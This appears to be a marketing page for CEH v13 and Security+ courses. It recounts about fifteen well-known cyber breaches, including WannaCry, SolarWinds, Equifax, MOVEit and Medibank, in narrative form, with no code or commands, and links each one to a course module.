10 real breaches that changed industries, toppled companies, and proved why cybersecurity is the most in-demand skill in tech. These are not hypothetical — they happened.
A stolen NSA exploit crippled 150 countries in 72 hours — and a 22-year-old stopped it for $10.69.
On May 12, 2017, a cryptoworm called WannaCry began spreading at a speed the world had never seen. Within hours it had hit hospitals, banks, telecoms, and government agencies across 150 countries. In the UK, the NHS was brought to its knees — 80 hospital trusts locked out of patient records, surgeries cancelled, ambulances diverted.
WannaCry exploited EternalBlue, a vulnerability in Windows SMBv1 secretly developed by the NSA as a cyber weapon. When The Shadow Brokers leaked the NSA's tools in April 2017, attackers weaponised EternalBlue immediately. Microsoft had issued a patch two months earlier — but millions of machines hadn't applied it.
The unlikely hero was Marcus Hutchins, a 22-year-old British researcher. He noticed the malware querying an unregistered domain as a kill-switch. He registered it for £8.29 — and the spread stopped almost instantly.
CEH v13 covers vulnerability assessment, patch management, and network defence.
Hackers hid inside the US government for 9 months by poisoning a routine software update used by 18,000 organisations.
In late 2020, FireEye discovered their own offensive tools had been stolen. Tracing the intrusion revealed one of the most sophisticated attacks in history — Russia's SVR had quietly poisoned a SolarWinds Orion software update, delivering the SUNBURST backdoor to 18,000 customers including the Pentagon, Treasury, DHS, Microsoft, and Cisco.
Attackers had first accessed SolarWinds systems in October 2019 — 14 months before discovery. They spent months inside networks reading emails, moving laterally, and exfiltrating intelligence while appearing as legitimate Orion traffic.
Learn to audit third-party software and detect lateral movement.
One leaked password, no MFA — and the US East Coast ran out of fuel.
On May 7, 2021, Colonial Pipeline shut down 5,500 miles of US fuel infrastructure after a DarkSide ransomware attack. The pipeline supplies 45% of fuel on the US East Coast. Petrol stations ran dry, prices spiked, and the federal government declared a state of emergency.
The FBI found the root cause: a single VPN account with a compromised password found in a dark web credential dump. No MFA. The account belonged to an employee who had since left — it was never deprovisioned. Colonial paid $4.4M in Bitcoin; the DOJ later recovered $2.3M by seizing the attackers' wallet.
CEH v13 Modules 2 & 5 cover OSINT, dark web monitoring and vulnerability analysis.
147 million Americans' most sensitive data stolen — because a patch sat unapplied for 78 days.
Equifax holds the financial history of nearly every American adult. In 2017, a Chinese state-sponsored group exploited CVE-2017-5638 — an Apache Struts flaw with a publicly available patch for 78 days. Attackers spent 76 days running 9,000 database queries, stealing SSNs, birth dates, addresses, and credit cards for 147.9 million people.
A congressional report called it "entirely preventable." Equifax's CISO, CIO, and CEO all resigned. The SSL inspection certificate had also expired 19 months earlier, making their security monitoring blind to the exfiltration traffic — until they renewed it and immediately noticed the breach.
CEH v13 Module 5 teaches systematic CVE scanning and patch cycle management.
Disguised as ransomware, it was a weapon designed to destroy. $10B in damage. No decryption key existed.
NotPetya began in Ukraine on June 27, 2017, spreading globally via a poisoned Ukrainian accounting software update. Initially appearing as ransomware, security researchers quickly confirmed there was no real decryption mechanism — NotPetya was a wiper designed purely to destroy, attributed to Russia's GRU.
Shipping giant Maersk had 45,000 PCs and 1,000 applications wiped in 7 minutes. They rebuilt their entire global network from scratch — fortunately a single domain controller in Ghana survived because a power outage had left it offline. Merck lost $870M. FedEx subsidiary TNT lost $400M and never fully recovered.
CEH v13 covers malware threats and the incident response procedures that determine who survives.
40 million credit cards stolen over Christmas. The entry point? A heating and air conditioning contractor.
In November 2013, attackers compromised Fazio Mechanical Services, a small HVAC contractor with remote access to Target's systems for billing. Using phished Fazio credentials, they installed POS malware on Target's checkout terminals across 1,800+ stores during the busiest retail week of the year.
Between November 27 and December 15, the malware silently collected 40 million payment cards. Target's $1.6M FireEye security system detected and alerted — but the alerts were reviewed and dismissed. The breach was ultimately discovered by the US DOJ, not by Target.
CEH v13 covers vendor risk management, network access controls, and SOC alert procedures.
No malware. No exploit. A phone call, a LinkedIn profile, and 10 minutes to shut down a $14B casino empire.
In September 2023, Scattered Spider — mostly English-speaking teenagers and young adults — shut down MGM Resorts worldwide. Slot machines went dark, hotel key cards stopped working, the website went offline, casino floors ran manually for 10+ days. The entire attack relied purely on human psychology.
The attackers found an MGM IT employee on LinkedIn in approximately 10 minutes, called the IT helpdesk impersonating that employee, and used social engineering to get credentials reset. With Okta superadmin access, they deployed BlackCat/ALPHV ransomware across MGM's infrastructure.
Learn how attackers exploit human psychology and how to design systems that resist it.
One line of text. 3 billion devices. Apple, Amazon, Tesla, and the US government all scrambling at once.
On December 9, 2021, CVE-2021-44228 in Apache Log4j received a CVSS score of 10.0 — the maximum possible. Log4j was embedded in virtually every enterprise Java application: Apple iCloud, Amazon AWS, Tesla, Twitter, Steam, VMware, Cisco, IBM, and US government systems. A single malicious string sent to any input field triggered full remote code execution. No authentication required.
Within hours of public disclosure, mass exploitation had begun. CISA issued an emergency directive within 72 hours ordering all federal agencies to patch immediately. At peak, researchers observed over 100 exploitation attempts per minute. The vulnerability had existed in production code for over a decade.
CEH v13 Module 5 teaches vulnerability scanning and rapid emergency patching response.
The largest data breach in history. Yahoo hid it for two years. Then hid a second breach. Then a third.
In August 2013, state-sponsored Russian hackers compromised all 3 billion Yahoo accounts ever created. Passwords were hashed with MD5 — a hashing algorithm considered broken since the mid-1990s. Security questions were stored in plain text. Yahoo discovered the breach in 2014, then sat on it for two more years before disclosure.
Yahoo initially said "only" 500 million accounts were affected. Then they revised to 1 billion. A year later, all 3 billion accounts. The scale was so vast that every Yahoo account ever created was compromised for years without users knowing. Verizon cut their acquisition price by $350M when the breach came to light.
Learn modern password hashing, encryption standards, and why outdated crypto creates catastrophic vulnerabilities.
An 18-year-old spammed push notifications until an employee gave up — then announced it on Uber's own Slack.
In September 2022, an 18-year-old hacker compromised Uber's entire internal network using a purchased credential and relentless social engineering. The attacker repeatedly sent MFA push notification requests to a contractor's phone — a technique called MFA fatigue or push bombing. After dozens of notifications over several minutes, the employee accepted one.
Inside, the attacker found PowerShell scripts with hardcoded admin credentials on a network share. Within an hour they had access to AWS, GCP, VMware vSphere, Slack, and HackerOne — including confidential vulnerability reports. They announced the breach directly in Uber's company Slack. Employees thought it was a joke.
CEH v13 covers modern auth attacks, social engineering countermeasures and secrets auditing.
One SQL injection zero-day in file transfer software gave Cl0p simultaneous access to 2,620 organisations — without deploying a single piece of malware.
On the Friday before US Memorial Day 2023 — when IT teams were heading for the long weekend — Cl0p ransomware group activated a zero-day SQL injection vulnerability they had been quietly developing for over two years. CVE-2023-34362 affected MOVEit Transfer, managed file transfer software used by thousands of enterprises, governments, and healthcare providers to move sensitive data.
Unlike traditional ransomware, Cl0p didn't encrypt a single file. They went straight for the data — exfiltrating records from all 2,620 organisations simultaneously, then sending extortion letters. Victims included the BBC, British Airways, Shell, the US Department of Energy, and Maximus — which exposed records of 11 million US Medicare and Medicaid beneficiaries.
SQL injection is hands-on in DVWA (Damn Vulnerable Web App) and OWASP Juice Shop on our lab environment. Try both manual exploitation (Union-based, Boolean blind) and automated enumeration. CEH v13 Module 14 covers web application hacking including SQL injection attack chains exactly like this one.
Learn to find, exploit, and defend against injection attacks in our DVWA and Juice Shop labs.
China's HAFNIUM chained 4 zero-days to bypass authentication and own 250,000 email servers worldwide — then the patch release triggered a global exploitation free-for-all.
In early 2021, China's HAFNIUM APT group discovered and quietly exploited four chained vulnerabilities in Microsoft Exchange Server — the email platform used by hundreds of thousands of organisations worldwide. The first vulnerability, CVE-2021-26855 (ProxyLogon), was a server-side request forgery (SSRF) flaw allowing complete authentication bypass from the internet — no credentials required.
Microsoft released patches on March 2, 2021. But here's what made it catastrophic: other nation-state actors reverse-engineered the patch to understand the vulnerability. Within 24 hours of the patch release, at least 10 different APT groups had joined HAFNIUM in mass exploitation. Organisations that hadn't patched overnight found web shells already deployed when they arrived at work the next morning.
SSRF and HTTP header manipulation are covered in CEH v13 Module 14 (Web Server Hacking). Practise authentication bypass techniques on DVWA and explore web shell deployment on Metasploitable 2 in our lab. Understanding how chained vulnerabilities multiply attack impact is a core CEH exam objective.
Modules 5 and 14 cover vulnerability chaining, SSRF, and web server exploitation techniques.
Attackers targeted one engineer's home PC, stole cloud credentials, pulled 33 million encrypted vaults — then drained $35M from users' crypto wallets using TOTP seeds that LastPass stored unencrypted.
LastPass, trusted by 33 million users to store every password they own, suffered two linked breaches in 2022. In August 2022, an attacker stole source code and customer data using compromised developer credentials. Four months later, they used data from Breach 1 to identify a specific DevOps engineer — then compromised that engineer's home personal computer using an unpatched Plex Media Server vulnerability (CVE-2020-5741).
That home PC had the engineer's AWS decryption keys — giving the attacker access to LastPass's cloud backup storage. They exfiltrated encrypted password vaults for all 33 million users. But the real weapon was what was stored unencrypted: website URLs, usernames, email addresses, and critically — TOTP authenticator seeds. With those seeds, attackers could generate valid MFA codes for any site where users had stored their 2FA in LastPass — including crypto exchanges.
Cloud security and secrets management are covered in CEH v13 Module 19 (Cloud Computing) and Security+ Domain 3 (Implementation). Practise identifying misconfigured cloud storage access controls. Understand why endpoint security must extend to personal devices — any home machine with corporate credentials is a potential entry point.
CEH v13 Module 19 and Security+ cover cloud access controls, secrets vaults, and privileged endpoint security.
A 17-year-old used LinkedIn recon, phone vishing, and a real-time AiTM phishing portal to hijack Obama, Biden, Musk, Gates, and Apple — then ran a Bitcoin scam from the world's most trusted accounts.
On July 15, 2020, the world watched in real time as verified accounts for Barack Obama, Joe Biden, Bill Gates, Elon Musk, Apple, Uber, and 124 others simultaneously posted: "I'm giving back to the community due to COVID-19. Send $1,000, I'll send $2,000 back." Every post was a scam. Every account had been completely taken over by a 17-year-old in Tampa, Florida — using nothing but a phone call.
Graham Ivan Clark and his accomplices used LinkedIn to identify Twitter employees with access to internal tools, then called them posing as Twitter IT department staff. They directed employees to a fake internal VPN portal that harvested credentials and MFA tokens in real time — a classic adversary-in-the-middle (AiTM) attack. With those credentials, they accessed Twitter's internal "agent tool" — a customer support platform that could change email addresses, disable 2FA, and generate login sessions for any account on Twitter.
Social engineering, vishing, and phishing defence are covered in CEH v13 Module 9 (Social Engineering). Learn to recognise and defeat adversary-in-the-middle (AiTM) phishing attacks — including how attackers intercept live MFA tokens. Understand why hardware-bound FIDO2 keys are the only MFA resistant to this attack, and why privileged tool access must be logged and rate-limited.
CEH v13 Module 9 covers vishing, spear phishing, AiTM attacks, and social engineering countermeasures.
When Australia's largest health insurer refused to pay a $9.7M ransom, a Russian hacker published cancer diagnoses, HIV status, and mental health records for 9.7 million Australians — targeting the most vulnerable patients first.
In October 2022, Australia's largest private health insurer discovered a hacker had been inside their systems for weeks. Aleksandr Ermakov, a Russian national linked to the REvil ransomware group, had obtained the credentials of a Medibank contractor — credentials that gave direct VPN access to Medibank's internal network. There was no MFA on the VPN connection. A single username and password was all that stood between the attacker and 9.7 million medical records.
Ermakov spent weeks inside the network performing reconnaissance before exfiltrating customer records — including the most sensitive category of personal data imaginable: medical diagnoses, treatment procedures, mental health records, HIV status, substance abuse history, and reproductive health data. When Medibank refused to pay the $9.7M ransom, he deliberately published a "naughties list" — the names and conditions of patients with drug habits, mental health conditions, and HIV — to maximise public pressure and human suffering.
Third-party access risk and network reconnaissance are covered in CEH v13 Modules 2–5 (Footprinting, Network Scanning, Enumeration, Vulnerability Analysis). Learn to detect lateral movement with SIEM tools and understand network segmentation to contain breaches. MFA implementation and third-party access controls are core objectives of Security+ Domain 3.
CEH v13 and Security+ cover VPN hardening, third-party access control, dark web monitoring, and incident response.
WannaCry. SolarWinds. Colonial Pipeline. MOVEit. LastPass. Medibank. Every single breach on this page was preventable with the right skills — patch management, MFA, SQL injection defence, social engineering awareness. CEH v13 and Security+ teach you exactly what was missing in every case.